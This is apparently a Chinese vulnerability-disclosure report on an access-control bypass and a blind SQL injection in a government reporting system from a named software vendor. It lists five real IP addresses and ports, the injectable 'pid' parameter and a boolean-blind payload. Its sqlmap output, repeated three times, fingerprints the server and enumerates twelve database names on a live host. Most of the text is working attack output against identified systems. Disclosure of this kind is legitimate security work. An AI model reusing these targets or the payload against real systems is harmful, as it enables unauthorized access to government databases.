某政府系统一处越权+一处SQL注入

### 简要描述： RT ### 详细说明： 山东农友软件公司官网:http://www.nongyou.com.cn/ 越权案例如下： http://221.2.149.47:8100/jubao/left.aspx http://222.135.109.70:8100/jubao/left.aspx http://123.134.189.60:8012/jubao/left.aspx http://218.56.40.229:8020/jubao/left.aspx http://222.135.127.190:7000/jubao/left.aspx [<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png) 2.一处越权注入： http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid= http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid= 2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= [<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz --- [18:13:11] [INFO] testing MySQL [18:13:11] [WARNING] the back-end DBMS is not MySQL [18:13:11] [INFO] testing Oracle sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n [18:13:12] [WARNING] the back-end DBMS is not Oracle [18:13:12] [INFO] testing PostgreSQL [18:13:12] [WARNING] the back-end DBMS is not PostgreSQL [18:13:12] [INFO] testing Microsoft SQL Server [18:13:12] [WARNING] reflective value(s) found and filtering out [18:13:12] [INFO] confirming Microsoft SQL Server [18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [18:13:13] [INFO] fetching database names [18:13:13] [INFO] fetching number of databases [18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [18:13:13] [INFO] retrieved: 12 [18:13:14] [INFO] retrieved: gangchengnl [18:13:22] [INFO] retrieved: gaoxinqunl [18:13:31] [INFO] retrieved: kaifaqunl [18:13:41] [INFO] retrieved: laichengnl [18:13:51] [INFO] retrieved: laiwunl [18:13:58] [INFO] retrieved: master [18:14:03] [INFO] retrieved: model [18:14:08] [INFO] retrieved: msdb [18:14:11] [INFO] retrieved: ReportServer [18:14:21] [INFO] retrieved: ReportServerTempDB [18:14:36] [INFO] retrieved: tempdb [18:14:41] [INFO] retrieved: xueyenl available databases [12]: [*] gangchengnl [*] gaoxinqunl [*] kaifaqunl [*] laichengnl [*] laiwunl [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] xueyenl [18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator\.sqlmap\output\123.134.189.60' ``` 均可复现。 ### 漏洞证明： 2.测试注入点:http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= [<img src="https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz --- [18:13:11] [INFO] testing MySQL [18:13:11] [WARNING] the back-end DBMS is not MySQL [18:13:11] [INFO] testing Oracle sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you want to follow? [Y/n] n [18:13:12] [WARNING] the back-end DBMS is not Oracle [18:13:12] [INFO] testing PostgreSQL [18:13:12] [WARNING] the back-end DBMS is not PostgreSQL [18:13:12] [INFO] testing Microsoft SQL Server [18:13:12] [WARNING] reflective value(s) found and filtering out [18:13:12] [INFO] confirming Microsoft SQL Server [18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [18:13:13] [INFO] fetching database names [18:13:13] [INFO] fetching number of databases [18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [18:13:13] [INFO] retrieved: 12 [18:13:14] [INFO] retrieved: gangchengnl [18:13:22] [INFO] retrieved: gaoxinqunl [18:13:31] [INFO] retrieved: kaifaqunl [18:13:41] [INFO] retrieved: laichengnl [18:13:51] [INFO] retrieved: laiwunl [18:13:58] [INFO] retrieved: master [18:14:03] [INFO] retrieved: model [18:14:08] [INFO] retrieved: msdb [18:14:11] [INFO] retrieved: ReportServer [18:14:21] [INFO] retrieved: ReportServerTempDB [18:14:36] [INFO] retrieved: tempdb [18:14:41] [INFO] retrieved: xueyenl available databases [12]: [*] gangchengnl [*] gaoxinqunl [*] kaifaqunl [*] laichengnl [*] laiwunl [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] xueyenl [18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator\.sqlmap\output\123.134.189.60' ``` [<img src="https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png)

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\123.134.189.60'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\123.134.189.60'